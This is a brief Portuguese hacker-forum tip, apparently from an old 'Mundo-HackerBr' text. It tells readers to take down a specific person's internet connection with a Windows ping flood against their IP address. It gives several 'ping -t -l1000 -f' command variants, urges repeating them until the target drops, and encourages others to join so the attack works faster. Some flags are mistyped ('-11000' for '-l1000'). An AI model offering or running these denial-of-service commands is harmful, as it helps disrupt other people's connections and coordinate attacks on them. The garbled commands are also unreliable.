Meu Nuke Não Funciona!
Se seu nuke nao está derrubando ninguem então
Tente o
seguinte comando no prompt do MS-DOS:
ping -f-l1000 -t ipdocara
ou
ping -t -11000 -f ipdocara
Ficando assim:
C:\WINDOWS>ping -f-11000 -t ipdocara
ou
C:\WINDOWS>ping -t -11000 -f ipdocara
Repita o procedimento ate ele cair. Lembre-se de que, quanto mais
pessoas fazendo junto com você, mais rápido será o tombo :-)))
(--Mundo-HackerBr--) By HellSufer